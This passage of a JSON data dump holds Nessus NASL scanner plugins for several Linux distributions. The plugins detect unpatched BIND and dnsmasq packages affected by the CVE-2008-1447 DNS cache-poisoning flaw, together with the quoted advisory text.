reference:\"selinux-policy-mls-2.4.6-137.1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"selinux-policy-strict-2.4.6-137.1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"selinux-policy-targeted-2.4.6-137.1.el5_2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-devel / bind-libbind-devel / bind-libs / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-17T12:44:13", "description": "From Red Hat Security Advisory 2008:0789 :\n\nAn updated dnsmasq package that implements UDP source-port\nrandomization is now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nDnsmasq is lightweight DNS forwarder and DHCP server. 
It is designed\nto provide DNS and, optionally, DHCP, to a small network.\n\nThe dnsmasq DNS resolver used a fixed source UDP port. This could have\nmade DNS spoofing attacks easier. dnsmasq has been updated to use\nrandom UDP source ports, helping to make DNS spoofing attacks harder.\n(CVE-2008-1447)\n\nAll dnsmasq users are advised to upgrade to this updated package, that\nupgrades dnsmasq to version 2.45, which resolves this issue.", "edition": 24, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : dnsmasq (ELSA-2008-0789)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:dnsmasq", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2008-0789.NASL", "href": "https://www.tenable.com/plugins/nessus/67735", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2008:0789 and \n# Oracle Linux Security Advisory ELSA-2008-0789 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67735);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_xref(name:\"RHSA\", value:\"2008:0789\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"Oracle Linux 5 : dnsmasq (ELSA-2008-0789)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2008:0789 :\n\nAn updated dnsmasq package that implements UDP source-port\nrandomization is now available for Red Hat Enterprise Linux 
5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nDnsmasq is lightweight DNS forwarder and DHCP server. It is designed\nto provide DNS and, optionally, DHCP, to a small network.\n\nThe dnsmasq DNS resolver used a fixed source UDP port. This could have\nmade DNS spoofing attacks easier. dnsmasq has been updated to use\nrandom UDP source ports, helping to make DNS spoofing attacks harder.\n(CVE-2008-1447)\n\nAll dnsmasq users are advised to upgrade to this updated package, that\nupgrades dnsmasq to version 2.45, which resolves this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-August/000706.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dnsmasq package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dnsmasq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"dnsmasq-2.45-1.el5_2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dnsmasq\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-17T14:03:02", "description": "The transaction id and the UDP source port used for DNS queries by the\nbind nameserver were predictable. 
Attackers could potentially exploit\nthat weakness to manipulate the DNS cache ('DNS cache poisoning',\nCVE-2008-1447).", "edition": 24, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : bind (bind-82)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2009-07-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bind-chrootenv", "cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:bind-utils", "p-cpe:/a:novell:opensuse:bind-libs", "p-cpe:/a:novell:opensuse:bind-libs-32bit", "p-cpe:/a:novell:opensuse:bind-devel", "p-cpe:/a:novell:opensuse:bind"], "id": "SUSE_11_0_BIND-080708.NASL", "href": "https://www.tenable.com/plugins/nessus/39920", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update bind-82.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39920);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"openSUSE Security Update : bind (bind-82)\");\n script_summary(english:\"Check for the bind-82 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The transaction id and the UDP source port used for DNS queries by the\nbind nameserver were predicatable. 
Attackers could potentially exploit\nthat weakness to manipulate the DNS cache ('DNS cache poisoning',\nCVE-2008-1447).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=396963\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-chrootenv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release 
=~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"bind-9.4.2-39.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"bind-chrootenv-9.4.2-39.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"bind-devel-9.4.2-39.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"bind-libs-9.4.2-39.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"bind-utils-9.4.2-39.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.4.2-39.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chrootenv / bind-devel / bind-libs / bind-libs-32bit / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-07T10:52:23", "description": "The remote host is affected by the vulnerability described in GLSA-200807-08\n(BIND: Cache poisoning)\n\n Dan Kaminsky of IOActive has reported a weakness in the DNS protocol\n related to insufficient randomness of DNS transaction IDs and query\n source ports.\n \nImpact :\n\n An attacker could exploit this weakness to poison the cache of a\n recursive resolver and thus spoof DNS traffic, which could e.g. 
lead to\n the redirection of web or mail traffic to malicious sites.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "published": "2008-07-15T00:00:00", "title": "GLSA-200807-08 : BIND: Cache poisoning", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-15T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:bind"], "id": "GENTOO_GLSA-200807-08.NASL", "href": "https://www.tenable.com/plugins/nessus/33494", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200807-08.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33494);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_xref(name:\"GLSA\", value:\"200807-08\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"GLSA-200807-08 : BIND: Cache poisoning\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200807-08\n(BIND: Cache poisoning)\n\n Dan Kaminsky of IOActive has reported a weakness in the DNS protocol\n related to insufficient randomness of DNS transaction IDs and query\n source ports.\n \nImpact :\n\n An attacker could exploit this weakness to poison the cache of a\n 
recursive resolver and thus spoof DNS traffic, which could e.g. lead to\n the redirection of web or mail traffic to malicious sites.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200807-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All BIND users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-dns/bind-9.4.2_p1'\n Note: In order to utilize the query port randomization to mitigate the\n weakness, you need to make sure that your network setup allows the DNS\n server to use random source ports for query and that you have not set a\n fixed query port via the 'query-source port' directive in the BIND\n configuration.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/15\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-dns/bind\", unaffected:make_list(\"ge 9.4.2_p1\"), vulnerable:make_list(\"lt 9.4.2_p1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"BIND\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-17T14:43:31", "description": "This update of dnsmasq uses random UDP source ports and a random TRXID\nnow. (CVE-2008-1447)", "edition": 23, "published": "2008-08-15T00:00:00", "title": "openSUSE 10 Security Update : dnsmasq (dnsmasq-5512)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2008-08-15T00:00:00", "cpe": ["cpe:/o:novell:opensuse:10.3", "cpe:/o:novell:opensuse:10.2", "p-cpe:/a:novell:opensuse:dnsmasq"], "id": "SUSE_DNSMASQ-5512.NASL", "href": "https://www.tenable.com/plugins/nessus/33895", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update dnsmasq-5512.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33895);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_xref(name:\"IAVA\", 
value:\"2008-A-0045\");\n\n script_name(english:\"openSUSE 10 Security Update : dnsmasq (dnsmasq-5512)\");\n script_summary(english:\"Check for the dnsmasq-5512 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of dnsmasq uses random UDP source ports and a random TRXID\nnow. (CVE-2008-1447)\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dnsmasq package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dnsmasq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/15\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.2|SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", 
\"10.2 / 10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.2\", reference:\"dnsmasq-2.45-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"dnsmasq-2.45-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dnsmasq\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-20T15:44:13", "description": "Dan Kaminsky discovered weaknesses in the DNS protocol as implemented\nby Dnsmasq. A remote attacker could exploit this to spoof DNS entries\nand poison DNS caches. Among other things, this could lead to\nmisdirected email and web traffic.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2008-07-23T00:00:00", "title": "Ubuntu 8.04 LTS : dnsmasq vulnerability (USN-627-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-23T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:dnsmasq-base", "p-cpe:/a:canonical:ubuntu_linux:dnsmasq", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts"], "id": "UBUNTU_USN-627-1.NASL", "href": "https://www.tenable.com/plugins/nessus/33560", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-627-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33560);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_xref(name:\"USN\", value:\"627-1\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"Ubuntu 8.04 LTS : dnsmasq vulnerability (USN-627-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dan Kaminsky discovered weaknesses in the DNS protocol as implemented\nby Dnsmasq. A remote attacker could exploit this to spoof DNS entries\nand poison DNS caches. 
Among other things, this could lead to\nmisdirected email and web traffic.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/627-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dnsmasq and / or dnsmasq-base packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dnsmasq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dnsmasq-base\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/23\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2008-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! 
get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"dnsmasq\", pkgver:\"2.41-2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"dnsmasq-base\", pkgver:\"2.41-2ubuntu2.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dnsmasq / dnsmasq-base\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-17T09:10:22", "description": "New bind packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\n10.1, 10.2, 11.0, 12.0, 12.1, and -current to address a security\nproblem.", "edition": 25, "published": "2011-05-28T00:00:00", "title": "Slackware 10.0 / 10.1 / 10.2 / 11.0 / 12.0 / 12.1 / 8.1 / 9.0 / 9.1 / current : bind (SSA:2008-191-02)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2011-05-28T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:12.0", "cpe:/o:slackware:slackware_linux:8.1", "cpe:/o:slackware:slackware_linux:9.0", "cpe:/o:slackware:slackware_linux:9.1", "cpe:/o:slackware:slackware_linux:10.1", "p-cpe:/a:slackware:slackware_linux:bind", "cpe:/o:slackware:slackware_linux:10.0", "cpe:/o:slackware:slackware_linux:11.0", 
"cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:10.2", "cpe:/o:slackware:slackware_linux:12.1"], "id": "SLACKWARE_SSA_2008-191-02.NASL", "href": "https://www.tenable.com/plugins/nessus/54869", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2008-191-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(54869);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_xref(name:\"CERT\", value:\"800113\");\n script_xref(name:\"SSA\", value:\"2008-191-02\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"Slackware 10.0 / 10.1 / 10.2 / 11.0 / 12.0 / 12.1 / 8.1 / 9.0 / 9.1 / current : bind (SSA:2008-191-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n 